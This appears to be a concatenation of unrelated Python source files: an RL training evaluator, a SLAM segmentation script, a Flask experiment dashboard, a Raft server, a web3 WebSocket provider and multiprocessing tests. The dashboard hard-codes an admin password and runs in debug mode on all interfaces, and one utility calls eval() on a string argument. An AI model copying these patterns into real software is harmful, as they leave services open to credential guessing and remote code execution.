state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num,
learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae)
agent.save_or_load_agent(args.cwd, if_save=False)
act = agent.act
[setattr(param, 'requires_grad', False) for param in agent.act.parameters()]
del agent
'''init Evaluator'''
eval_env = build_eval_env(args.eval_env, args.env, args.eval_gpu_id, args.env_num)
evaluator = Evaluator(cwd=args.cwd, agent_id=0,
eval_env=eval_env, eval_gap=args.eval_gap,
eval_times1=args.eval_times1, eval_times2=args.eval_times2,
target_return=args.target_return, if_overwrite=args.if_overwrite)
evaluator.save_or_load_recoder(if_save=False)
'''loop'''
cwd = args.cwd
break_step = args.break_step
if_allow_break = args.if_allow_break
del args
if_save = False
if_train = True
if_reach_goal = False
with torch.no_grad():
while if_train:
act_dict, steps, r_exp, logging_tuple = self.pipe0.recv()
if act_dict:
act.load_state_dict(act_dict)
if_reach_goal, if_save = evaluator.evaluate_and_save(act, steps, r_exp, logging_tuple)
else:
evaluator.total_step += steps
if_train = not ((if_allow_break and if_reach_goal)
or evaluator.total_step > break_step
or os.path.exists(f'{cwd}/stop'))
self.pipe0.send((if_train, if_save))
print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}')
evaluator.save_or_load_recoder(if_save=True)
# class PipeVectorEnv:
# def __init__(self, args):
# self.env_num = args.env_num
# self.pipes = [mp.Pipe() for _ in range(self.env_num)]
# self.pipe0s = [pipe[0] for pipe in self.pipes]
#
# env = build_env(args.eval_env)
# self.max_step = env.max_step
# self.env_name = env.env_name
# self.state_dim = env.state_dim
# self.action_dim = env.action_dim
# self.action_max = env.action_max
# self.if_discrete = env.if_discrete
# self.target_return = env.target_return
# del env
#
# self.process = list()
# for env_id in range(args.env_num):
# self.process.append(mp.Process(target=self.run, args=(args, env_id)))
# args.random_seed += 1 # set different for each env
# # [p.start() for p in self.process]
#
# def reset(self):
# vec_state = [pipe0.recv() for pipe0 in self.pipe0s]
# return vec_state
#
# def step(self, vec_action): # pipe0_step
# for i in range(self.env_num):
# self.pipe0s[i].send(vec_action[i])
# return [pipe0.recv() for pipe0 in self.pipe0s] # list of (state, reward, done)
#
# def run(self, args, env_id):
# np.random.seed(args.random_seed)
#
# env = build_env(args.eval_env, if_print=False)
# pipe1 = self.pipes[env_id][1]
# del args
#
# state = env.reset()
# pipe1.send(state)
#
# while True:
# action = pipe1.recv()
# state, reward, done, _ = env.step(action)
# pipe1.send((env.reset() if done else state, reward, done))
#
# # def check(self):
# # vec_state = self.reset()
# # ten_state = np.array(vec_state)
# # print(ten_state.shape)
# #
# # vec_action = np.array(((0.0, 1.0, 0.0),
# # (0.0, 0.5, 0.0),
# # (0.0, 0.1, 0.0),))[:self.env_num]
# # assert self.env_num <= 3
# #
# # trajectory_list = list()
# # for _ in range(8):
# # s_r_d_list = self.step(vec_action)
# # ten_state = np.array([s_r_d[0] for s_r_d in s_r_d_list])
# # print(ten_state.shape)
# # trajectory_list.append(s_r_d_list)
# #
# # trajectory_list = list(map(list, zip(*trajectory_list))) # 2D-list transpose
# # print('| shape of trajectory_list:', len(trajectory_list), len(trajectory_list[0]))
def get_comm_data(agent):
act = list(agent.act.parameters())
cri_optim = get_optim_parameters(agent.cri_optim)
if agent.cri is agent.act:
cri = None
act_optim = None
else:
cri = list(agent.cri.parameters())
act_optim = get_optim_parameters(agent.act_optim)
act_target = list(agent.act_target.parameters()) if agent.if_use_act_target else None
cri_target = list(agent.cri_target.parameters()) if agent.if_use_cri_target else None
return act, act_optim, cri, cri_optim, act_target, cri_target # data
"""Utils"""
def get_num_learner(visible_gpu):
assert isinstance(visible_gpu, str) # visible_gpu may in {'0', '1', '1,', '1,2', '1,2,'}
visible_gpu = eval(visible_gpu)
num_learner = 1 if isinstance(visible_gpu, int) else len(visible_gpu)
return num_learner
def process_safely_terminate(process):
for p in process:
try:
p.kill()
except OSError as e:
print(e)
pass
def get_optim_parameters(optim): # for avg_update_optim()
params_list = list()
for params_dict in optim.state_dict()['state'].values():
params_list.extend([t for t in params_dict.values() if isinstance(t, torch.Tensor)])
return params_list
def avg_update_optim(dst_optim, src_optim_param, device):
for dst, src in zip(get_optim_parameters(dst_optim), src_optim_param):
dst.data.copy_((dst.data + src.data.to(device)) * 0.5)
# dst.data.copy_(src.data * tau + dst.data * (1 - tau))
def avg_update_net(dst_net, src_net_param, device):
for dst, src in zip(dst_net.parameters(), src_net_param):
dst.data.copy_((dst.data + src.data.to(device)) * 0.5)
|
RDR.py
|
from maskrcnn_benchmark.config import cfg
from demo.predictor import COCODemo
from RDRSeg import RDRSeg
from sptam.dynaseg import DynaSegt,DynaSeg
from sptam.msptam import SPTAM, stereoCamera
from sptam.components import Camera
from sptam.components import StereoFrame
from sptam.feature import ImageFeature
from sptam.params import ParamsKITTI
from sptam.dataset import KITTIOdometry
# import orbslam2
import g2o
import sys
import cv2 as cv
import fcntl
import numpy as np
import os
import shutil
import time
from threading import Thread
def load_images(path_to_sequence):
res = [os.path.join(path_to_sequence, img) for img in os.listdir(path_to_sequence)]
res.sort()
return res
def load_times(path_to_sequence):
timestamps = []
with open(os.path.join(path_to_sequence, 'times.txt')) as times_file:
for line in times_file:
if len(line) > 0:
timestamps.append(float(line))
return timestamps
def pose_to_transformation(pose):
res = np.zeros((4,4))
for i in range(3):
res[i,:3] = pose[4*i+1:4*(i+1)]
res[i,3] = pose[4*i]
res[3,3] = 1
res = np.linalg.inv(res)
return res
def save_trajectory(trajectory, filename):
try:
with open(filename, 'w') as traj_file:
fcntl.flock(traj_file, fcntl.LOCK_EX | fcntl.LOCK_NB)
traj_file.writelines('{r00} {r01} {r02} {t0} {r10} {r11} {r12} {t1} {r20} {r21} {r22} {t2}\n'.format(
r00=repr(r00),
r01=repr(r01),
r02=repr(r02),
t0=repr(t0),
r10=repr(r10),
r11=repr(r11),
r12=repr(r12),
t1=repr(t1),
r20=repr(r20),
r21=repr(r21),
r22=repr(r22),
t2=repr(t2)
) for stamp, r00, r01, r02, t0, r10, r11, r12, t1, r20, r21, r22, t2 in trajectory)
traj_file.close()
return 1
except:
return 0
def main(orb_path, data_path, device, save, sequence):
sequence_path = os.path.join(data_path, sequence)
vocab_path = os.path.join(orb_path, 'Vocabulary/ORBvoc.txt')
file_path = os.path.join(sequence_path, 'image_2')
left_filenames = load_images(file_path)
file_path = os.path.join(sequence_path, 'image_3')
right_filenames = load_images(file_path)
timestamps = load_times(sequence_path)
prob_path = os.path.join('/usr/stud/linp/storage/user/linp/prob/', sequence)
prob_filenames = load_images(prob_path)
config_file = '../../maskrcnn-benchmark/configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml'
cfg.merge_from_file(config_file)
# manual override some options
cfg.merge_from_list(["MODEL.DEVICE", device])
coco_demo = COCODemo(
cfg,
min_image_size=800,
confidence_threshold=0.7,
)
dilation = 2
kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (2 * dilation + 1, 2 * dilation + 1))
depth_path = os.path.join('/usr/stud/linp/storage/user/linp/depth/',sequence)
iml = cv.imread(left_filenames[0], cv.IMREAD_UNCHANGED)
config = stereoCamera(sequence)
num_images = len(left_filenames)
rdrseg = RDRSeg(iml, coco_demo, depth_path, kernel, config)
ins = int(sequence)
if ins < 3:
settings_path = os.path.join(orb_path, 'Examples/Stereo/KITTI00-02.yaml')
elif ins == 3:
settings_path = os.path.join(orb_path, 'Examples/Stereo/KITTI03.yaml')
else:
settings_path = os.path.join(orb_path, 'Examples/Stereo/KITTI04-12.yaml')
# slam0 = orbslam2.System(vocab_path, settings_path, orbslam2.Sensor.STEREO)
# slam0.set_use_viewer(False)
# slam0.initialize()
#
# slam = orbslam2.System(vocab_path, settings_path, orbslam2.Sensor.STEREO)
# slam.set_use_viewer(False)
# slam.initialize()
params = ParamsKITTI()
dataset = KITTIOdometry(sequence_path)
sptam = SPTAM(params)
cam = Camera(
dataset.cam.fx, dataset.cam.fy, dataset.cam.cx, dataset.cam.cy,
dataset.cam.width, dataset.cam.height,
params.frustum_near, params.frustum_far,
dataset.cam.baseline)
if save == '1':
dpath = 'pmask/rdr{}/'.format(sequence) #
if os.path.exists(dpath):
shutil.rmtree(dpath)
os.mkdir(dpath)
start_time = time.time()
for idx in range(num_images):
print('{} frame'.format(idx))
left_image = cv.imread(left_filenames[idx], cv.IMREAD_UNCHANGED)
right_image = cv.imread(right_filenames[idx], cv.IMREAD_UNCHANGED)
prob_image = cv.imread(prob_filenames[idx])
timestamp = timestamps[idx]
# left_mask = np.ones((rdrseg.h, rdrseg.w, 1), dtype=np.uint8)
# right_mask = np.ones((rdrseg.h, rdrseg.w, 1), dtype=np.uint8)
# slam0.process_image_stereo(left_image[:, :, ::-1], right_image[:, :, ::-1], left_mask, right_mask, timestamp)
# trans = pose_to_transformation(slam0.get_trajectory_points()[-1])
featurel = ImageFeature(left_image, params)
featurer = ImageFeature(right_image, params)
t = Thread(target=featurer.extract)
t.start()
featurel.extract()
t.join()
frame = StereoFrame(idx, g2o.Isometry3d(), featurel, featurer, cam, timestamp=timestamp)
if not sptam.is_initialized():
sptam.initialize(frame)
else:
sptam.track(frame)
if idx % 3 == 0:
if idx:
rdrseg.update(left_image, right_image, idx, frame)
c = rdrseg.rdr_seg_rec(left_image, prob_image, idx,frame)
if save == '1':
cv.imwrite(os.path.join(dpath, '{0:06}.png'.format(idx)), c)
# slam.process_image_stereo(left_image[:, :, ::-1], right_image[:, :, ::-1], left_mask, right_mask, timestamp)
# i = 0
# result_path = 'rdr/d{}{}.txt'.format(sequence,i)
# while True:
# if not os.path.exists(result_path):
# s_flag = save_trajectory(slam.get_trajectory_points(), result_path)
# if s_flag:
# print(result_path)
# break
# i += 1
# result_path = 'rdr/d{}{}.txt'.format(sequence, i)
#
# slam.shutdown()
mean_time = (time.time() - start_time) / num_images
print('sequence ',sequence)
print('mean process time: {}'.format(round(mean_time,2)))
if __name__ == '__main__':
if len(sys.argv) != 6:
print('Usage: ./orbslam_stereo_kitti path_to_orb path_to_data device save_img sequence ')
main(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
|
api.py
|
# app.py
from os import name
import threading
from flask import Flask, render_template, send_file, Response, abort, jsonify, request, url_for, redirect, logging
from sqlalchemy.sql import text
# Para o upload de arquivos
from werkzeug.utils import secure_filename
# Para a autenticação
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash
# Experiments Models
from Model import *
auth = HTTPBasicAuth()
users = {
"admin": generate_password_hash("letmein")
}
@auth.verify_password
def verify_password(username, password):
if username in users and \
check_password_hash(users.get(username), password):
return username
app = Flask(__name__, template_folder="templates")
app.config['MAX_CONTENT_LENGTH'] = 1024 * 1024
app.config['UPLOAD_EXTENSIONS'] = ['.sql']
app.config['UPLOAD_PATH'] = 'uploads/'
@app.route('/')
def hello():
exp = db.query(Experiment).all()
qtd = len(exp)
return render_template("index.html", count=qtd, experiments=exp)
@app.route('/experiment/<id>')
def detailExperiment(id):
exp = db.query(Experiment).filter_by(id=id).first()
return render_template("expDetail.html", exp=exp)
def runExperiment(id):
db.query(Experiment).filter_by(id=id).first().run()
@app.route('/experiment/run/<id>')
@auth.login_required
def showRunStatus(id):
process = threading.Thread(target=runExperiment, args=(id,))
process.start()
return render_template("run.html", user=auth.current_user())
@app.route('/experiment/run/progress')
@auth.login_required
def getProgress():
isRun = False
progress = 0
toEnd = 999999999
with open("COOJA.log", "r") as f:
for line in f.readlines():
data = line.split(']')[3]
if data.startswith(' - Test script activated'):
isRun = True
if data.startswith(" - Test script"):
if data.startswith(" - Test script at"):
exp = re.compile(' - Test script at (\d+.\d+|\d+)%, done in (\d+.\d+|\d+) sec').match(data)
progress = int(float(exp.group(1)))
toEnd = exp.group(2)
if data.startswith(' - Test script finished'):
isRun = False
toEnd = 0
progress = 100
log = len(open('COOJA.testlog').readlines())
status = {'run': isRun, 'progress': progress, 'doneIn': toEnd, 'logFile': log}
return jsonify(status)
@app.route('/experiment/run/<id>/metrics')
@auth.login_required
def extractMetricFromRun(id):
run = db.query(Run).filter_by(id=id).first()
run.metric = Metrics(run)
#db.save(run)
db.commit()
return render_template("runDetail.html", run=run , user=auth.current_user())
@app.route('/experiment/add/', methods=['GET'])
@auth.login_required
def showExperimentAdd():
experiments = db.query(Experiment).all()
qtd = len(experiments)
return render_template("expAdd.html", count=qtd, experiments=experiments, user=auth.current_user())
@app.route('/experiment/add/', methods=['POST'])
@auth.login_required
def executeExperimentAdd():
expName = request.form['expName']
expFile = request.form['expFile']
exp = Experiment(name=expName,experimentFile=expFile)
db.add(exp)
db.commit()
experiments = db.query(Experiment).all()
qtd = len(experiments)
return render_template("expAdd.html", count=qtd, experiments=experiments, user=auth.current_user())
@app.route('/run/<id>')
def detailRun(id):
run = db.query(Run).filter_by(id=id).first()
hasMetric = False
if run.metric is None:
hasMetric = True
return render_template("runDetail.html", run=run, hasMetric=hasMetric)
@app.route('/run/summary/<id>')
def summaryRun(id):
run = db.query(Run).filter_by(id=id).first()
return render_template("runSummary.html", run=run)
@app.route('/metrics/slotframe/<size>')
def metricBySlotFrame(size):
retorno = []
runs = db.query(Run).all()
for r in runs:
parameters = r.parameters
if parameters['TSCH_SCHEDULE_CONF_DEFAULT_LENGTH'] == size:
retorno.append(r)
return render_template("metricSlotFrame.html", id=size, retorno=retorno)
@app.route('/metrics/sendrate/<interval>')
def metricBySendInterval(interval):
retorno = []
runs = db.query(Run).all()
for r in runs:
parameters = r.parameters
if parameters['APP_SEND_INTERVAL_SEC'] == interval:
retorno.append(r)
return render_template("metricSentInterval.html", id=interval, retorno=retorno)
@app.route('/admin/db/show', methods=['GET'])
@auth.login_required
def showDB():
import sqlite3
global engine
print ("Engine:", engine)
exp = db.query(Experiment).all()
qtd = len(exp)
return render_template("index.html", count=qtd, experiments=exp)
@app.route('/admin/db/switch', methods=['GET'])
@auth.login_required
def switchDB():
import sqlite3
global engine
print ("Engine:", engine)
exp = db.query(Experiment).all()
qtd = len(exp)
fisico = sqlite3.connect(DBName)
fisico.backup(memConnection)
engine = memEngine
return render_template("index.html", count=qtd, experiments=exp)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=9001, debug=True)
|
raft_server.py
|
import argparse
import logging
import random
import threading
import zlib
from threading import Thread
from time import sleep
from helper import helper
from persistence import synchronized_log
from rpc.messages import ClientData, ClientDataResponse
from rpc.rpc_handler import RPCHandler
from rpc.serializer import RaftSerializer
from raft_config import RaftConfig
from states.states import Follower, Candidate, Leader
logger = logging.getLogger(__name__)
log_format = '%(asctime)s - %(levelname)s - %(module)s - %(threadName)s - %(message)s'
# logging.basicConfig(format=logFormat, filename=RaftConfig().LOG_FILE, level=RaftConfig().LOG_LEVEL)
logging.basicConfig(format=log_format, level=RaftConfig().LOG_LEVEL)
class ServernameFilter(logging.Filter):
def __init__(self, servername):
logging.Filter.__init__(self)
self.servername = servername
def filter(self, record):
record.servername = self.servername
return True
class ZLibCompressor(object):
def compress(self, data):
return zlib.compress(data)
def decompress(self, data):
return zlib.decompress(data)
class NoOpEncryptor(object):
def encrypt(self, data):
return data
def decrypt(self, data):
return data
class RaftThread(Thread):
def __init__(self, hostname, group=None, target=None, name=None,
args=(), kwargs=None):
super(RaftThread, self).__init__(group, target, name,
args, kwargs)
self.name = hostname + " - " + self.name
class RaftServer(object):
def __init__(self, peers, hostname=RaftConfig().HOSTNAME, port=RaftConfig().PORT,
compressor=ZLibCompressor, encryptor=NoOpEncryptor, rpc_handler=RPCHandler,
serializer=RaftSerializer):
self.peers = peers
self.hostname = hostname
logger.addFilter(ServernameFilter(self.hostname))
self.port = port
self._state = None
self.__compressor = compressor()
self.__encryptor = encryptor()
self.__rpc_handler = rpc_handler(self.hostname, self.port, self._handle_msg)
self.__serializer = serializer()
self.__send_threads = []
self.shutdown = False
self._timeout_watcher_thread = RaftThread(self.hostname, target=self._timeout_thread_watcher)
self._last_valid_rpc = helper.get_current_time_millis()
self._timeout_watcher_thread.start()
self._message_lock = threading.Lock()
@property
def state(self):
return self._state
@state.setter
def state(self, state):
logger.info("{}: Switching state from {} to {}".format(self.hostname, self._state.__class__.__name__,
state.__class__.__name__))
self._state = state
def _timeout_thread_watcher(self):
while not self.shutdown:
# Sleep a random time before starting a vote
random.seed(helper.get_current_time_nanos())
sleep_seconds = random.randint(
RaftConfig().ELECTION_TIMEOUT_IN_MILLIS_MIN,
RaftConfig().ELECTION_TIMEOUT_IN_MILLIS_MAX) / 1000.0
logger.debug("{}: Sleeping {} seconds before deciding to start a vote".format(self.hostname, sleep_seconds))
sleep(sleep_seconds)
if len(self.peers) > 0 and not isinstance(self.state, Leader) and not isinstance(self.state, Candidate):
current_time_millis = helper.get_current_time_millis()
if (current_time_millis - self._last_valid_rpc) > RaftConfig().ELECTION_TIMEOUT_IN_MILLIS_MIN:
logger.info("{}: No valid RPC received in the last {} milliseconds, switching to Candidate"
.format(self.hostname, (current_time_millis - self._last_valid_rpc)))
self.state = self.state.switch_to(Candidate)
else:
logger.debug("{}: Received message from Leader in time, staying a Follower".format(self.hostname))
def _handle_msg(self, string):
self._last_valid_rpc = helper.get_current_time_millis()
obj = self._deserialize(string)
self._message_lock.acquire()
resp_obj = self.state.handle(obj)
self._message_lock.release()
# wait until a new leader is found before denying a client a request
if isinstance(resp_obj, ClientDataResponse):
if not resp_obj.success and resp_obj.leaderId is None:
while not self.shutdown and self.state.currentLeaderId is None:
logger.error("Received client request but currently no leader, wait 1 second...")
sleep(1)
string = None
if resp_obj is not None:
string = self._serialize(resp_obj)
return string
def _serialize(self, obj):
if obj is None:
return None
serialized_string = self.__serializer.serialize(obj)
serialized_string = self.__compressor.compress(serialized_string)
serialized_string = self.__encryptor.encrypt(serialized_string)
return serialized_string
def _deserialize(self, string):
if string is None or string == '':
return None
string = self.__encryptor.decrypt(string)
string = self.__compressor.decompress(string)
obj = self.__serializer.deserialize(string)
return obj
def start(self):
logger.info("Starting server...")
logger.info("Peers: {}".format(self.peers))
if len(self.peers) == 0:
logger.info("No peers configured, starting as Leader")
self._state = Leader(self, 0, None, synchronized_log.SynchronizedLog(), None)
else:
logger.info("{} peers configured, starting as Follower".format(len(self.peers)))
self._state = Follower(self, 0, None, synchronized_log.SynchronizedLog(), None)
self.__rpc_handler.startup()
logger.info("Server listening on {}:{}".format(self.hostname, self.port))
def send(self, hostname, port, obj):
serialized_string = self._serialize(obj)
return self._deserialize(self.__rpc_handler.send(hostname, port, serialized_string))
def _send_and_handle(self, hostname, port, obj):
logger.debug("Sending message to {}".format(hostname))
serialized_string = self._serialize(obj)
send_time = helper.get_current_time_millis()
resp_string = self.__rpc_handler.send(hostname, port, serialized_string)
resp_time = helper.get_current_time_millis()
if resp_time - send_time > 50:
logger.warning("{}: It took {}ms to send a message to and receive a response from: {}:{}".format(
self.hostname, (resp_time - send_time), hostname, port))
self._handle_msg(resp_string)
def send_and_handle_async(self, hostname, port, obj):
t = RaftThread(self.hostname, target=self._send_and_handle, args=(hostname, port, obj))
self.__send_threads.append(t)
t.start()
def broadcast(self, obj):
for peer in self.peers:
host = peer
port = int(RaftConfig().PORT)
if isinstance(peer, tuple):
host = peer[0]
port = int(peer[1])
self.send_and_handle_async(host, port, obj)
def stop(self):
self.shutdown = True
self.__rpc_handler.shutdown()
for t in self.__send_threads:
while t.is_alive():
pass
while self._timeout_watcher_thread.is_alive():
pass
logger.info("Server stopped successfully.")
if __name__ == "__main__":
argparse = argparse.ArgumentParser(description="Start a new server or send a message as a client")
argparse.add_argument("--test", action="store_true")
argparse.add_argument("--server", action="store_true")
argparse.add_argument("--peers", type=str, default=RaftConfig().PORT)
argparse.add_argument("--client", action="store_true")
argparse.add_argument("--host", type=str, default=RaftConfig().HOSTNAME)
argparse.add_argument("--port", type=int, default=RaftConfig().PORT)
args = argparse.parse_args()
# python raft_server.py --server --host andi-vbox --port 48000 --peers localhost:48001,127.0.0.1:48002
# python raft_server.py --server --host localhost --port 48001 --peers andi-vbox:48000,127.0.0.1:48002
# python raft_server.py --server --host 127.0.0.1 --port 48002 --peers localhost:48001,andi-vbox:48000
if args.server:
peer_tuples = []
for peer in args.peers.split(","):
splitted_peer = peer.split(":")
peer_tuples.append((splitted_peer[0], splitted_peer[1]))
server = RaftServer(peer_tuples, hostname=args.host, port=args.port)
try:
server.start()
except Exception as e:
logger.exception(e)
server.stop()
exit(1)
if args.client:
try:
server = RaftServer([])
logger.info("Connecting to: {}:{}".format(args.host, args.port))
resp = server.send(args.host, args.port, ClientData("hello world"))
if resp is not None:
logger.info("Success: {}, Leader: {}".format(resp.success, resp.leaderId))
server.stop()
except Exception as e:
logger.exception(e)
exit(1)
if args.test or (not args.client and not args.server):
server1 = RaftServer([("localhost", 48001), ("andi-vbox", 48002)], hostname="127.0.0.1", port=48000)
server2 = RaftServer([("127.0.0.1", 48000), ("localhost", 48001)], hostname="andi-vbox", port=48002)
server3 = RaftServer([("andi-vbox", 48002), ("127.0.0.1", 48000)], hostname="localhost", port=48001)
server1.start()
server2.start()
server3.start()
|
Utility.py
|
from threading import Thread
def threaded(fn):
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
|
websocket.py
|
import asyncio
import json
import logging
import os
from threading import (
Thread,
)
from types import (
TracebackType,
)
from typing import (
Any,
Type,
)
from eth_typing import (
URI,
)
import websockets
from web3.exceptions import (
ValidationError,
)
from web3.providers.base import (
JSONBaseProvider,
)
from web3.types import (
RPCEndpoint,
RPCResponse,
)
RESTRICTED_WEBSOCKET_KWARGS = {'uri', 'loop'}
DEFAULT_WEBSOCKET_TIMEOUT = 10
def _start_event_loop(loop: asyncio.AbstractEventLoop) -> None:
asyncio.set_event_loop(loop)
loop.run_forever()
loop.close()
def _get_threaded_loop() -> asyncio.AbstractEventLoop:
new_loop = asyncio.new_event_loop()
thread_loop = Thread(target=_start_event_loop, args=(new_loop,), daemon=True)
thread_loop.start()
return new_loop
def get_default_endpoint() -> URI:
return URI(os.environ.get('WEB3_WS_PROVIDER_URI', 'ws://127.0.0.1:8546'))
class PersistentWebSocket:
def __init__(
self, endpoint_uri: URI, loop: asyncio.AbstractEventLoop, websocket_kwargs: Any
) -> None:
self.ws: websockets.WebSocketClientProtocol = None
self.endpoint_uri = endpoint_uri
self.loop = loop
self.websocket_kwargs = websocket_kwargs
async def __aenter__(self) -> websockets.WebSocketClientProtocol:
if self.ws is None:
self.ws = await websockets.connect(
uri=self.endpoint_uri, loop=self.loop, **self.websocket_kwargs
)
return self.ws
async def __aexit__(
self, exc_type: Type[BaseException], exc_val: BaseException, exc_tb: TracebackType
) -> None:
if exc_val is not None:
try:
await self.ws.close()
except Exception:
pass
self.ws = None
class WebsocketProvider(JSONBaseProvider):
logger = logging.getLogger("web3.providers.WebsocketProvider")
_loop = None
def __init__(
self,
endpoint_uri: URI=None,
websocket_kwargs: Any=None,
websocket_timeout: int=DEFAULT_WEBSOCKET_TIMEOUT,
) -> None:
self.endpoint_uri = endpoint_uri
self.websocket_timeout = websocket_timeout
if self.endpoint_uri is None:
self.endpoint_uri = get_default_endpoint()
if WebsocketProvider._loop is None:
WebsocketProvider._loop = _get_threaded_loop()
if websocket_kwargs is None:
websocket_kwargs = {}
else:
found_restricted_keys = set(websocket_kwargs.keys()).intersection(
RESTRICTED_WEBSOCKET_KWARGS
)
if found_restricted_keys:
raise ValidationError(
'{0} are not allowed in websocket_kwargs, '
'found: {1}'.format(RESTRICTED_WEBSOCKET_KWARGS, found_restricted_keys)
)
self.conn = PersistentWebSocket(
self.endpoint_uri, WebsocketProvider._loop, websocket_kwargs
)
super().__init__()
def __str__(self) -> str:
return "WS connection {0}".format(self.endpoint_uri)
async def coro_make_request(self, request_data: bytes) -> RPCResponse:
async with self.conn as conn:
await asyncio.wait_for(
conn.send(request_data),
timeout=self.websocket_timeout
)
return json.loads(
await asyncio.wait_for(
conn.recv(),
timeout=self.websocket_timeout
)
)
def make_request(self, method: RPCEndpoint, params: Any) -> RPCResponse:
self.logger.debug("Making request WebSocket. URI: %s, "
"Method: %s", self.endpoint_uri, method)
request_data = self.encode_rpc_request(method, params)
future = asyncio.run_coroutine_threadsafe(
self.coro_make_request(request_data),
WebsocketProvider._loop
)
return future.result()
|
__init__.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import test.support
import test.support.script_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocess.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocess as multiprocessing
import multiprocess.dummy
import multiprocess.connection
import multiprocess.managers
import multiprocess.heap
import multiprocess.pool
from multiprocess import util
try:
from multiprocess import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocess.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
def latin(s):
return s.encode('latin')
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocess.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(100)
def test_terminate(self):
if self.TYPE == 'threads':
